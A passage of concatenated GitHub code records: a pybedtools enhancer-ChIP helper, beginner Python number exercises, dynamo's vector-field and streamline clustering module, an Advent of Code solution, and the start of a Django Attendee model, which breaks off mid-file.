os.scandir(d.path) if f.path.endswith(\".bed.gz\")]\n if len(chip_files)>1:\n chip_bed = pybedtools.BedTool(\"\", from_string=True).cat(*chip_files)\n elif len(chip_files)==1:\n chip_bed = pybedtools.BedTool(chip_files[0])\n else:\n raise ValueError(f\"Chipfile not found for {chip_name}\")\n return chip_bed\n\ndef link_enhancers_to_chip(chip_dir, chip_type, chip_name, peak_file):\n peak_bed = pybedtools.BedTool(peak_file)\n chip_bed = parse_chip_file(chip_dir, chip_type, chip_name)\n df = peak_bed.intersect(chip_bed, u=True).to_dataframe()\n df = modify_empty_dataframe(df)\n df[chip_type] = chip_name\n return df.loc[:, [\"chrom\", 
\"start\", \"end\", chip_type]]\n\ndef link_enhancers_to_multiple_chips(chip_dir, chip_type, chip_names, peak_file):\n chip_dfs = [link_enhancers_to_chip(chip_dir, chip_type, chip, peak_file) for chip in chip_names]\n df = pd.concat(chip_dfs, axis=0)\n return df.groupby([\"chrom\", \"start\", \"end\"]).agg(lambda x: x.to_list())\n","repo_name":"deeprob/starrseq_enhancer_characterization","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"25045905970","text":"def isprime(num):\n n=num//2\n while n>1:\n if num%n==0:\n return False\n n-=1\n return True\n\n\ndef getfactors(num):\n fac=[]\n n=num//2\n while n:\n if num%n==0:\n fac.append(n)\n n-=1\n fac.append(num)\n return fac\n\n\n#素因子分解\n#注意:这里所有的因子之积应该等于num,未实现\ndef return_prime_factors(num):\n f=getfactors(num)\n for i in f:\n if not isprime(i):\n f.remove(i)\n return f\n\n\ndef isperfect(num):\n f=getfactors(num)\n return 2*num==sum(i for i in f)\n\n\n\ndef nmul(num):\n s=1\n for i in range(1,num+1):\n s=s*i\n return s\n\ndef fib(n):\n l=[0,1]\n i=2\n while i<=n:\n l.append(l[i-1]+l[i-2])\n i+=1\n return l[n]\n\n\n\ndef printnum(n1,n2):\n print(\"DEC\\tBIN\\tOCT\\t\\HEX\\tASCII\")\n print(\"---------------------------------------\")\n for i in range(n1,n2+1):\n if i<33:\n print(i,bin(i),oct(i),hex(i))\n else:\n print(i,bin(i),oct(i),hex(i),chr(i))\n\n\ndef myinput():\n list=[]\n n=input(\"Enter total name:\")\n n=int(n)\n i=1\n wr_count=0\n while n:\n str=input(\"Please input name %d\" % i)\n str=str.strip()\n if \",\" not in str:\n print(\"Wrong format...should be Last,First.\")\n str.replace(' ',',')\n wr_count+=1\n print(\"YOU have done %d time(s)\" % wr_count)\n list.append(str)\n i+=1\n n-=1\n print(\"the sorted list is:\")\n for s in sorted(list):\n print(s)\n","repo_name":"vimalk78/Code_training","sub_path":"Python/chapter 8.py","file_name":"chapter 8.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71639142625","text":"from typing import List, Optional, Union\n\nimport numpy as np\nimport pandas as pd\nfrom anndata import AnnData\nfrom scipy.sparse import csr_matrix\nfrom scipy.stats import mode\nfrom sklearn.neighbors import NearestNeighbors\n\nfrom ..dynamo_logger import main_info\nfrom ..preprocessing.pca import pca\nfrom ..tools.clustering import hdbscan, leiden, louvain\nfrom ..tools.connectivity import k_nearest_neighbors\nfrom ..tools.Markov import (\n grid_velocity_filter,\n prepare_velocity_grid_data,\n velocity_on_grid,\n)\nfrom ..utils import LoggerManager, copy_adata\nfrom .scVectorField import SvcVectorField\nfrom .utils import vecfld_from_adata\n\n\ndef cluster_field(\n adata: AnnData,\n basis: str = \"pca\",\n features: List = [\"speed\", \"potential\", \"divergence\", \"acceleration\", \"curvature\", \"curl\"],\n add_embedding_basis: bool = True,\n embedding_basis: Optional[str] = None,\n normalize: bool = False,\n method: str = \"leiden\",\n cores: int = 1,\n copy: bool = False,\n resolution: float = 1.0,\n **kwargs,\n) -> Optional[AnnData]:\n \"\"\"Cluster cells based on vector field features.\n\n We would like to see whether the vector field can be used to better define cell state/types. This can be accessed\n via characterizing critical points (attractor/saddle/repressor, etc.) and characteristic curves (nullcline,\n separatrix). 
However, the calculation of those is not easy, for example, a strict definition of an attractor is\n states where velocity is 0 and the eigenvalue of the jacobian matrix at that point is all negative. Under this\n strict definition, we may sometimes find the attractors are very far away from our sampled cell states which makes\n them less meaningful although this can be largely avoided when we decide to remove the density correction during the\n velocity projection. This is not unexpected as the vector field we learned is defined via a set of basis functions\n based on gaussian kernels and thus it is hard to satisfy that strict definition.\n\n Fortunately, we can handle this better with the help of a different set of ideas. Instead of using critical points\n by the classical dynamic system methods, we can use some machine learning approaches that are based on extracting\n geometric features of streamline to \"cluster vector field space\" for define cell states/type. This requires\n calculating, potential (ordered pseudotime), speed, curliness, divergence, acceleration, curvature, etc. Thanks to\n the fact that we can analytically calculate the Jacobian matrix, those quantities of the vector field function\n can be conveniently and efficiently calculated.\n\n Args:\n adata: adata object that includes both newly synthesized and total gene expression of cells. Alternatively,\n the object should include both unspliced and spliced gene expression of cells.\n basis: The space that will be used for calculating vector field features. Valid names includes, for example, `pca`,\n `umap`, etc.\n features: features have to be selected from ['speed', 'potential', 'divergence', 'acceleration', 'curvature', 'curl']\n add_embedding_basis: Whether to add the embedding basis to the feature space for clustering.\n embedding_basis: The embedding basis that will be combined with the vector field feature space for clustering.\n normalize: Whether to mean center and scale the feature across all cells.\n method: The method that will be used for clustering, one of `{'kmeans'', 'hdbscan', 'louvain', 'leiden'}`. If `louvain`\n or `leiden` used, you need to have `cdlib` installed.\n cores: The number of parallel jobs to run for neighbors search. ``None`` means 1 unless in a\n :obj:`joblib.parallel_backend` context.\n ``-1`` means using all processors.\n copy: Whether to return a new deep copy of `adata` instead of updating `adata` object passed in arguments.\n resolution: Clustering resolution, higher values yield more fine-grained clusters.\n kwargs: Any additional arguments that will be passed to either kmeans, hdbscan, louvain or leiden clustering algorithms.\n\n Returns:\n Either updates `adata` or directly returns a new `adata` object if `copy` is `True`.\n\n \"\"\"\n\n logger = LoggerManager.gen_logger(\"dynamo-cluster_field\")\n logger.log_time()\n adata = copy_adata(adata) if copy else adata\n\n features = list(\n set(features).intersection([\"speed\", \"potential\", \"divergence\", \"acceleration\", \"curvature\", \"curl\"])\n )\n if len(features) < 1:\n raise ValueError(\n \"features have to be selected from ['speed', 'potential', 'divergence', 'acceleration', \"\n f\"'curvature', 'curl']. 
your feature is {features}\"\n )\n\n feature_key = [\n \"speed_\" + basis,\n basis + \"_ddhodge_potential\",\n \"divergence_\" + basis,\n \"acceleration_\" + basis,\n \"curvature_\" + basis,\n \"curl_\" + basis,\n ]\n feature_list = [i + \"_\" + basis if i != \"potential\" else basis + \"_ddhodge_\" + i for i in features]\n\n if feature_key[0] not in adata.obs.keys() and feature_key[0] in feature_list:\n from ..vectorfield import speed\n\n speed(adata, basis=basis)\n if feature_key[1] not in adata.obs.keys() and feature_key[1] in feature_list:\n from ..ext import ddhodge\n\n ddhodge(adata, basis=basis)\n if feature_key[2] not in adata.obs.keys() and feature_key[2] in feature_list:\n from ..vectorfield import divergence\n\n divergence(adata, basis=basis)\n if feature_key[3] not in adata.obs.keys() and feature_key[3] in feature_list:\n from ..vectorfield import acceleration\n\n acceleration(adata, basis=basis)\n if feature_key[4] not in adata.obs.keys() and feature_key[4] in feature_list:\n from ..vectorfield import curvature\n\n curvature(adata, basis=basis)\n\n if feature_key[5] not in adata.obs.keys() and feature_key[5] in feature_list:\n from ..vectorfield import curl\n\n curl(adata, basis=basis)\n\n feature_data = adata.obs.loc[:, feature_list].values\n if embedding_basis is None:\n embedding_basis = basis\n if add_embedding_basis:\n X = np.hstack((feature_data, adata.obsm[\"X_\" + embedding_basis]))\n else:\n X = feature_data\n\n if normalize:\n # X = (X - X.min(0)) / X.ptp(0)\n X = (X - X.mean(0)) / X.std(0)\n\n if method in [\"hdbscan\", \"kmeans\"]:\n if method == \"hdbscan\":\n key = \"field_hdbscan\"\n hdbscan(adata, X_data=X, result_key=key, **kwargs)\n elif method == \"kmeans\":\n from sklearn.cluster import KMeans\n\n key = \"field_kmeans\"\n\n kmeans = KMeans(random_state=0, **kwargs).fit(X)\n adata.obs[key] = kmeans.labels_.astype(\"str\")\n\n # clusters need to be categorical variables\n adata.obs[key] = adata.obs[key].astype(\"category\")\n\n elif method in [\"louvain\", \"leiden\"]:\n nbrs_idx, dist = k_nearest_neighbors(\n X,\n k=30,\n exclude_self=False,\n pynn_rand_state=19491001,\n n_jobs=cores,\n logger=logger,\n )\n\n row = np.repeat(nbrs_idx[:, 0], 30)\n col = nbrs_idx[:, 1:].flatten()\n graph = csr_matrix(\n (np.repeat(1, len(col)), (row, col)),\n shape=(adata.n_obs, adata.n_obs),\n )\n adata.obsp[\"vf_feature_knn\"] = graph\n\n if method == \"leiden\":\n leiden(adata, resolution=resolution, adj_matrix_key=\"vf_feature_knn\", result_key=\"field_leiden\", **kwargs)\n elif method == \"louvain\":\n louvain(adata, resolution=resolution, adj_matrix_key=\"vf_feature_knn\", result_key=\"field_louvain\", **kwargs)\n\n logger.finish_progress(progress_name=\"clustering_field\")\n\n if copy:\n return adata\n return None\n\n\ndef streamline_clusters(\n adata: AnnData,\n basis: str = \"umap\",\n features: list = [\"speed\", \"divergence\", \"acceleration\", \"curvature\", \"curl\"],\n method: str = \"sparsevfc\",\n xy_grid_nums: list = [50, 50],\n density: float = 5,\n curvature_method: int = 1,\n feature_bins: int = 10,\n clustering_method: str = \"leiden\",\n assign_fixedpoints: bool = False,\n reversed_fixedpoints: bool = False,\n **kwargs,\n) -> None:\n \"\"\"Cluster 2D streamlines based on vector field features. Initialize a grid over the state space and compute the\n flow of data through the grid using plt.streamplot with a given density. For each individual streamline,\n computes the vector field 'features' of interest and stores the data via histograms. 
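Each streamline is thereby reduced to a fixed-length row of concatenated per-feature histogram values, so streamlines of different lengths become directly comparable. 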
\n    Args:\n        adata: An AnnData object to be analyzed.\n        basis: The basis to use for creating the vector field, either \"umap\" or \"tsne\". Defaults to \"umap\".\n        features: A list of features to calculate for each point in the vector field. Defaults to [\"speed\", \"divergence\", \"acceleration\", \"curvature\", \"curl\"].\n        method: The method to use for calculating the flow of data through the grid, either \"sparsevfc\" or \"gaussian\". Defaults to \"sparsevfc\".\n        xy_grid_nums: The number of points to use in the x and y dimensions of the grid. Defaults to [50, 50].\n        density: The density of the grid. Defaults to 5.\n        curvature_method: The method to use for calculating curvature. Defaults to 1.\n        feature_bins: The number of bins to use for discretizing the data. Defaults to 10.\n        clustering_method: The method to use for clustering the data into modules, either \"louvain\" or \"leiden\". Defaults to \"leiden\".\n        assign_fixedpoints: A boolean indicating whether to assign fixed points to the data. Defaults to False.\n        reversed_fixedpoints: A boolean indicating whether to also assign fixed points of the reversed vector field (streamline sources). Defaults to False.\n\n    Raises:\n        ImportError: If the \"cdlib\" package is not installed and the \"louvain\" or \"leiden\" clustering method is specified.\n        ValueError: If an invalid method is specified for calculating the flow of data through the grid.\n        ValueError: If an invalid method is specified for clustering the data into modules.\n\n    Returns:\n        None, but updates the `adata` object with the following fields of `adata.uns[\"streamline_clusters_\" + basis]`:\n            - \"feature_df\"\n            - \"segments\"\n            - \"X_pca\"\n            - \"clustering_method\"\n            - \"distances\"\n            - \"connectivities\"\n            - \"clusters\"\n            - \"fixed_point\"\n            - \"rev_fixed_point\"\n    \"\"\"\n\n    import matplotlib.pyplot as plt\n\n    vf_dict, func = vecfld_from_adata(adata, basis=basis)\n    grid_kwargs_dict = {\n        \"density\": None,\n        \"smooth\": None,\n        \"n_neighbors\": None,\n        \"min_mass\": None,\n        \"autoscale\": False,\n        \"adjust_for_stream\": True,\n        \"V_threshold\": None,\n    }\n\n    if method.lower() == \"sparsevfc\":\n        X, V = adata.obsm[\"X_\" + basis], adata.obsm[\"velocity_\" + basis]\n        X_grid, p_mass, neighs, weight = prepare_velocity_grid_data(\n            X,\n            xy_grid_nums,\n            density=grid_kwargs_dict[\"density\"],\n            smooth=grid_kwargs_dict[\"smooth\"],\n            n_neighbors=grid_kwargs_dict[\"n_neighbors\"],\n        )\n        for i in [\"density\", \"smooth\", \"n_neighbors\"]:\n            grid_kwargs_dict.pop(i)\n\n        V_emb = func(X)\n        V_grid = (V_emb[neighs] * weight[:, :, None]).sum(1) / np.maximum(1, p_mass)[:, None]\n        X_grid, V_grid = grid_velocity_filter(\n            V_emb=V,\n            neighs=neighs,\n            p_mass=p_mass,\n            X_grid=X_grid,\n            V_grid=V_grid,\n            **grid_kwargs_dict,\n        )\n    elif method.lower() == \"gaussian\":\n        X_grid, V_grid, D = velocity_on_grid(\n            vf_dict[\"X\"],\n            vf_dict[\"Y\"],\n            xy_grid_nums,\n            cut_off_velocity=True,\n            **grid_kwargs_dict,\n        )\n    else:\n        raise ValueError(\"only the `sparsevfc` and `gaussian` methods are supported\")\n\n    strm = plt.streamplot(\n        X_grid[0],\n        X_grid[1],\n        V_grid[0],\n        V_grid[1],\n        density=density,\n    )\n    strm_res = strm.lines.get_segments()  # get streamline segments\n\n    # split segments into different streamlines\n    line_list_ori = {}\n    line_ind = 
0\n    for i, seg in enumerate(strm_res):\n        if i == 0:\n            line_list_ori[0] = [seg]\n        else:\n            # the second point of the previous segment should be the same as the first point of the current segment\n            if all(strm_res[i - 1][1] == seg[0]):\n                line_list_ori[line_ind].append(seg)\n            else:\n                line_ind += 1\n                line_list_ori[line_ind] = [seg]\n\n    line_list = line_list_ori.copy()\n\n    # convert to list of numpy arrays.\n    for key, values in line_list_ori.items():\n        line_list_ori[key] = np.array(values).reshape((-1, 2))\n\n    # remove duplicated rows from the numpy arrays.\n    for key, values in line_list.items():\n        line_list[key] = np.unique(np.array(values).reshape((-1, 2)), axis=0)\n\n    vector_field_class = SvcVectorField()\n    vector_field_class.from_adata(adata, basis=basis)\n\n    has_acc = True if \"acceleration\" in features else False\n    has_curv = True if \"curvature\" in features else False\n    has_div = True if \"divergence\" in features else False\n    has_speed = True if \"speed\" in features else False\n    has_curl = True if \"curl\" in features else False\n\n    if has_acc:\n        acc_dict = {}\n    if has_curv:\n        cur_1_dict = {}\n        cur_2_dict = {}\n    if has_div:\n        div_dict = {}\n    if has_speed:\n        speed_dict = {}\n    if has_curl:\n        curl_dict = {}\n\n    # save features along the streamline and create a histogram for each feature\n    bins = feature_bins  # number of feature bins\n    line_len = []\n    feature_df = np.zeros((len(line_list), len(features) * bins))\n\n    for key, values in line_list.items():\n        line_len.append(values.shape[0])\n        tmp = None\n        if has_acc:\n            acceleration_val, _ = vector_field_class.compute_acceleration(values)\n            acc_dict[key] = acceleration_val\n\n            _, acc_hist = np.histogram(acceleration_val, bins=(bins - 1), density=True)\n            if tmp is None:\n                tmp = acc_hist\n        if has_curv:\n            curvature_val_1 = vector_field_class.compute_curvature(values, formula=1)[0]\n            cur_1_dict[key] = curvature_val_1\n\n            curvature_val_2, curvature_vec = vector_field_class.compute_curvature(values)\n            cur_2_dict[key] = curvature_val_2\n\n            _, cur_1_hist = np.histogram(curvature_val_1, bins=(bins - 1), density=True)\n            _, cur_2_hist = np.histogram(curvature_val_2, bins=(bins - 1), density=True)\n            if tmp is None:\n                tmp = cur_1_hist if curvature_method == 1 else cur_2_hist\n            else:\n                tmp = np.hstack((tmp, cur_1_hist if curvature_method == 1 else cur_2_hist))\n        if has_div:\n            divergence_val = vector_field_class.compute_divergence(values)\n            div_dict[key] = divergence_val\n\n            _, div_hist = np.histogram(divergence_val, bins=(bins - 1), density=True)\n            if tmp is None:\n                tmp = div_hist\n            else:\n                tmp = np.hstack((tmp, div_hist))\n        if has_speed:\n            speed_vec = vector_field_class.func(values)\n            speed_val = np.linalg.norm(speed_vec)\n            speed_dict[key] = speed_val\n\n            _, speed_hist = np.histogram(speed_val, bins=(bins - 1), density=True)\n            if tmp is None:\n                tmp = speed_hist\n            else:\n                tmp = np.hstack((tmp, speed_hist))\n        if has_curl:\n            curl_val = vector_field_class.compute_curl(values)\n            curl_dict[key] = curl_val\n\n            _, curl_hist = np.histogram(curl_val, bins=(bins - 1), density=True)\n            if tmp is None:\n                tmp = curl_hist\n            else:\n                tmp = np.hstack((tmp, curl_hist))\n\n        feature_df[key, :] = tmp\n
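\n    # With the default arguments (5 features, feature_bins=10), each streamline is summarized by a\n    # 5 * 10 = 50 dimensional row of feature_df; the PCA embedding and clustering below operate on these rows.\n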
\n    # clustering\n    feature_adata = AnnData(feature_df)\n    pca(feature_adata, X_data=feature_df, pca_key=\"X_pca\")\n    if clustering_method == \"louvain\":\n        louvain(feature_adata, obsm_key=\"X_pca\")\n    elif clustering_method == \"leiden\":\n        leiden(feature_adata, obsm_key=\"X_pca\")\n    elif clustering_method == \"hdbscan\":\n        key = \"field_hdbscan\"\n        hdbscan(feature_adata, X_data=feature_df, result_key=key, **kwargs)\n    elif clustering_method == \"kmeans\":\n        from sklearn.cluster import KMeans\n\n        key = \"field_kmeans\"\n        kmeans = KMeans(random_state=0, **kwargs).fit(feature_df)\n        feature_adata.obs[key] = kmeans.labels_.astype(\"str\")\n\n        # clusters need to be categorical variables\n        feature_adata.obs[key] = feature_adata.obs[key].astype(\"category\")\n    else:\n        raise ValueError(\n            \"only louvain, leiden, hdbscan and kmeans clustering are supported but the requested \"\n            f\"method is {clustering_method}\"\n        )\n\n    if assign_fixedpoints or reversed_fixedpoints:\n        tmp = np.array(strm.lines.get_segments()).reshape((-1, 2))\n        vector_field_class.data[\"X\"] = np.unique(tmp, axis=0)\n\n    if assign_fixedpoints:\n        (\n            X,\n            valid_fps_type_assignment,\n            assignment_id,\n        ) = vector_field_class.assign_fixed_points(cores=1)\n\n        feature_adata.obs[\"fixed_point\"] = -1\n\n    if reversed_fixedpoints:\n        # reverse the vector field to identify sources; bind the original function first so the\n        # lambda does not reference itself and recurse forever\n        orig_func = vector_field_class.func\n        vector_field_class.func = lambda x: -orig_func(x)\n        (\n            X_rev,\n            valid_fps_type_assignment_rev,\n            assignment_id_rev,\n        ) = vector_field_class.assign_fixed_points(cores=1)\n\n        feature_adata.obs[\"rev_fixed_point\"] = -1\n\n    data_X = vector_field_class.data[\"X\"]\n    for key, values in line_list.items():\n        indices = [np.where(np.logical_and(data_X[:, 0] == val[0], data_X[:, 1] == val[1]))[0][0] for val in values]\n\n        # assign the most frequent fixed point along the streamline\n        if assign_fixedpoints:\n            mode_val = mode(assignment_id[indices])[0][0]\n            if not np.isnan(mode_val):\n                feature_adata.obs.loc[str(key), \"fixed_point\"] = mode_val\n        if reversed_fixedpoints:\n            mode_val = mode(assignment_id_rev[indices])[0][0]\n            if not np.isnan(mode_val):\n                feature_adata.obs.loc[str(key), \"rev_fixed_point\"] = mode_val\n\n    adata.uns[\"streamline_clusters_\" + basis] = {\n        \"feature_df\": feature_df,\n        \"segments\": line_list_ori,\n        \"X_pca\": feature_adata.obsm[\"X_pca\"],\n        \"clustering_method\": clustering_method,\n        \"distances\": feature_adata.obsp[\"X_pca_distances\"],\n        \"connectivities\": feature_adata.obsp[\"X_pca_connectivities\"],\n        \"clusters\": feature_adata.obs[clustering_method].values,\n    }\n\n    if assign_fixedpoints:\n        adata.uns[\"streamline_clusters_\" + basis][\"fixed_point\"] = feature_adata.obs[\"fixed_point\"]\n    if reversed_fixedpoints:\n        adata.uns[\"streamline_clusters_\" + basis][\"rev_fixed_point\"] = feature_adata.obs[\"rev_fixed_point\"]\n","repo_name":"aristoteleo/dynamo-release","sub_path":"dynamo/vectorfield/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":19618,"program_lang":"python","lang":"en","doc_type":"code","stars":377,"dataset":"github-code","pt":"7"} +{"seq_id":"37725228887","text":"from functools import reduce\n\nfile_array = []\n\nwith open('Day_3/input.txt', 'r') as file:\n    for line in file:\n        file_array.append(line)\n\n\n# puzzle 1\nslope_right = 3\nslope_down = 1\ndown_index = 0\nright_index = 0\ntrees_1 = 0\n\nwhile down_index != (len(file_array) - 1):\n    down_index = down_index + slope_down\n    right_index = (right_index + slope_right) % (len(file_array[down_index]) - 1)\n    if file_array[down_index][right_index] == \"#\":\n        trees_1 += 1\n        print(down_index, right_index)\n\n# puzzle 2\nslope_right = [1, 3, 5, 7, 1]\nslope_down = [1, 1, 1, 1, 2]\nanswer_array = []\nanswer = 0\n\nfor index in range(len(slope_right)):\n    trees = 0\n    down_index = 0\n    right_index = 0\n    while down_index < (len(file_array) - 1):\n        down_index = down_index + slope_down[index]\n        right_index = (right_index + slope_right[index]) % 
(len(file_array[down_index]) - 1)\n if file_array[down_index][right_index] == \"#\":\n trees += 1\n answer_array.append(trees)\n\nanswer = reduce((lambda x, y: x * y), answer_array)\n\nprint(\"Puzzle 1 solution: \" + str(trees_1))\nprint(\"Puzzle 2 solution: \" + str(answer))","repo_name":"bray4168/AoC-2020","sub_path":"Day_3/Day_3.py","file_name":"Day_3.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74587699421","text":"from datetime import date, datetime, timedelta, timezone\nfrom partial_date import PartialDate, PartialDateField\nfrom uuid import uuid4\nimport opencc\nfrom django.conf import settings\nfrom django.contrib.contenttypes.fields import GenericRelation\nimport pghistory\nimport django.utils.timezone\nimport model_utils.fields\nimport partial_date.fields\n# import private_storage.fields\nfrom private_storage.storage.files import PrivateFileSystemStorage\nfrom django.contrib.postgres.indexes import GinIndex\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.db.models import Q\nfrom django.urls import reverse\nfrom django.utils.functional import cached_property\nfrom model_utils.models import SoftDeletableModel, TimeStampedModel\nfrom private_storage.fields import PrivateFileField\nfrom unidecode import unidecode\n\nfrom . import GenderEnum, Note, Utility\n\n\nclass Attendee(Utility, TimeStampedModel, SoftDeletableModel):\n FAMILY_CATEGORY = 0\n NON_FAMILY_CATEGORY = 25\n PAUSED_CATEGORY = 27\n SCHEDULED_CATEGORY = 1\n HIDDEN_ROLE = 0\n # RELATIVES_KEYWORDS = ['parent', 'mother', 'guardian', 'father', 'caregiver']\n # to find attendee's parents/caregiver in cowokers view of all activities\n # AS_PARENT_KEYWORDS = ['notifier', 'caregiver']\n # BE_LISTED_KEYWORDS = ['care receiver'] # let the attendee's attendance showed in their parent/caregiver account\n pasts = GenericRelation(\"persons.Past\")\n places = GenericRelation(\"whereabouts.Place\")\n notes = GenericRelation(Note)\n # related_ones = models.ManyToManyField('self',through='Relationship',symmetrical=False,related_name='related_to')\n id = models.UUIDField(default=uuid4, primary_key=True, editable=False, serialize=False)\n division = models.ForeignKey(\n \"whereabouts.Division\",\n default=0,\n null=False,\n blank=False,\n on_delete=models.SET(0),\n )\n user = models.OneToOneField(\n settings.AUTH_USER_MODEL,\n default=None,\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n )\n # families = models.ManyToManyField('persons.Family', through='FamilyAttendee', related_name='families')\n folks = models.ManyToManyField(\n \"persons.Folk\", through=\"FolkAttendee\", related_name=\"folks\"\n )\n first_name = models.CharField(max_length=25, db_index=True, null=True, blank=True)\n last_name = models.CharField(max_length=25, db_index=True, null=True, blank=True)\n first_name2 = models.CharField(max_length=12, db_index=True, null=True, blank=True)\n last_name2 = models.CharField(max_length=8, db_index=True, null=True, blank=True)\n gender = models.CharField(\n max_length=11,\n blank=False,\n null=False,\n default=GenderEnum.UNSPECIFIED,\n choices=GenderEnum.choices(),\n )\n actual_birthday = models.DateField(blank=True, null=True)\n estimated_birthday = PartialDateField(blank=True, null=True, help_text='1998, 1998-12 or 1992-12-31, please enter 1800 if year not known')\n deathday = models.DateField(blank=True, null=True)\n photo = PrivateFileField(\n \"Photo\", blank=True, 
null=True, upload_to=\"attendee_portrait\"\n ) # https://github.com/edoburu/django-private-storage\n infos = models.JSONField(\n null=True,\n blank=True,\n default=Utility.attendee_infos,\n help_text='Example: {\"fixed\": {\"food_pref\": \"peanut allergy\", \"nick_name\": \"John\"}}.'\n 'Please keep {} here even no data',\n )\n\n @property\n def display_label(self):\n return (\n (self.first_name or \"\")\n + \" \"\n + (self.last_name or \"\")\n + \" \"\n + (self.last_name2 or \"\")\n + (self.first_name2 or \"\")\n ).strip()\n\n @property\n def division_label(self):\n return self.division.display_name if self.division else None\n\n # @property\n # def other_relations(self):\n # return self.folks.exclude(category=self.FAMILY_CATEGORY)\n\n @property\n def related_ones(self): # Todo: need filter on folkattendee finish_date?\n return self.__class__.objects.filter(folks__in=self.folks.all()).distinct()\n\n @property\n def families(self):\n return self.folks.filter(category=self.FAMILY_CATEGORY)\n\n # def related_ones(self, only_current=True, only_active=True, folk_category_limit_to=None):\n # \"\"\"\n # :param only_current: if false, it will include expired folkattendee by existing finish date\n # :param only_active: if false, it will include deleted folkattendees and folks\n # :param folk_category_limit_to: to filter for a single int category id of folk\n # :return: Attendee queryset\n # \"\"\"\n # folk_filter = {}\n #\n # if folk_category_limit_to:\n # folk_filter['category'] = folk_category_limit_to\n #\n # if only_active:\n # folk_filter['is_removed'] = False\n #\n # filters = Q(\n # folkattendee__folk__in=self.folks.filter(**folk_filter)\n # )\n #\n # if only_active: # cannot combine with above\n # filters = filters & Q(folkattendee__is_removed=False)\n #\n # if only_current:\n # expire_filter = (\n # Q(folkattendee__finish__isnull=True)\n # |\n # Q(folkattendee__finish__gte=datetime.now(timezone.utc))\n # )\n # filters = filters & expire_filter\n #\n # return self.__class__.objects.filter(filters).distinct()\n\n @property\n def all_related_members(self):\n return self.__class__.objects.filter(\n Q(folks__in=self.folks.filter(category=self.FAMILY_CATEGORY))\n | Q( # self.folks.all() will include relationships of others\n folks__in=self.folks.filter(\n folkattendee__role=self.HIDDEN_ROLE\n ).exclude(category=self.FAMILY_CATEGORY)\n ),\n ).distinct()\n\n @property\n def other_relation_members(self):\n return self.__class__.objects.filter(\n folks__in=self.folks.filter(folkattendee__role=self.HIDDEN_ROLE).exclude(\n category=self.FAMILY_CATEGORY\n )\n ).distinct() # HIDDEN_ROLE indicates the relationship of the attendee, not others\n\n @cached_property\n def family_members(self):\n return self.__class__.objects.filter(\n folks__in=self.folks.filter(category=self.FAMILY_CATEGORY)\n ).distinct()\n\n @cached_property\n def self_phone_numbers(self):\n return self.self_addresses_for_fields_of([\"phone1\", \"phone2\"])\n\n @cached_property\n def self_email_addresses(self):\n return self.self_addresses_for_fields_of([\"email1\", \"email2\"])\n\n def self_addresses_for_fields_of(self, fields):\n contacts = self.infos.get(\"contacts\", {})\n return \", \".join(\n [contacts.get(field) for field in fields if contacts.get(field)]\n )\n\n @cached_property\n def caregiver_email_addresses(self):\n return self.caregiver_addresses_for_fields_of([\"email1\", \"email2\"])\n\n @cached_property\n def caregiver_phone_numbers(self):\n return self.caregiver_addresses_for_fields_of([\"phone1\", \"phone2\"])\n\n def 
caregiver_addresses_for_fields_of(self, fields):\n return \", \".join(\n set(\n a.self_addresses_for_fields_of(fields)\n for a in self.get_relative_emergency_contacts()\n )\n )\n\n def get_relative_emergency_contacts(self):\n return self.__class__.objects.filter(\n pk__in=[\n k for (k, v) in self.infos.get(\"emergency_contacts\", {}).items() if v\n ]\n )\n # self.related_ones.filter(\n # to_attendee__relation__relative=True,\n # to_attendee__relation__emergency_contact=True,\n # to_attendee__finish__gte=datetime.now(timezone.utc),\n # )\n\n def under_same_org_with(self, other_attendee_id):\n if other_attendee_id:\n return Attendee.objects.filter(\n pk=other_attendee_id, division__organization=self.division.organization\n ).exists()\n return False\n\n def can_be_scheduled_by(self, other_attendee_id):\n if str(self.id) == other_attendee_id:\n return True\n return Attendee.objects.filter(\n pk=self.id, infos__schedulers__contains={other_attendee_id: True}\n ).exists()\n\n def can_schedule_attendee(self, other_attendee_id):\n if str(self.id) == other_attendee_id:\n return True\n return Attendee.objects.filter(\n pk=other_attendee_id, infos__schedulers__contains={str(self.id): True}\n ).exists()\n # self.__class__.objects.filter(\n # (Q(from_attendee__finish__isnull=True) | Q(from_attendee__finish__gt=Utility.now_with_timezone())),\n # from_attendee__to_attendee__id=self.id,\n # from_attendee__from_attendee__id=other_attendee_id,\n # from_attendee__scheduler=True,\n # from_attendee__is_removed=False,\n # ).exists()\n\n def scheduling_attendees(self, include_self=True):\n \"\"\"\n :return: all attendees that can be scheduled by the attendee. For example, if a kid specified its\n parent by \"scheduler\" is true in its infos__schedulers, when calling parent_attendee.scheduling_attendees(),\n the kid will be returned, means the parent can change/see schedule of the kid.\n \"\"\"\n filters = Q(infos__schedulers__contains={str(self.id): True})\n\n if include_self:\n filters.add(Q(id=self.id), Q.OR)\n\n return self.__class__.objects.filter(filters)\n # self.__class__.objects.filter(\n # Q(id=self.id)\n # |\n # Q(\n # (Q(from_attendee__finish__isnull=True) | Q(from_attendee__finish__gt=Utility.now_with_timezone())),\n # from_attendee__to_attendee__id=self.id,\n # from_attendee__scheduler=True,\n # from_attendee__is_removed=False,\n # )\n # ).distinct()\n\n @cached_property\n def parents_notifiers_names(self):\n \"\"\"\n :return: attendees' names of their parents/caregiviers\n \"\"\"\n return \", \".join(\n list(\n self.get_relative_emergency_contacts().values_list(\n \"infos__names__original\", flat=True\n )\n )\n )\n\n def age(self):\n birthday = self.actual_birthday or (self.estimated_birthday and hasattr(self.estimated_birthday, 'date') and self.estimated_birthday.date)\n try:\n if birthday:\n age = (date.today() - birthday) // timedelta(days=365.2425)\n return age if age < 200 else None # estimated_birthday use 1800 as yearless date\n else:\n return None\n except Exception as e:\n print(\n self.__str__() + \"'s birthday incorrect: \",\n birthday,\n \". 
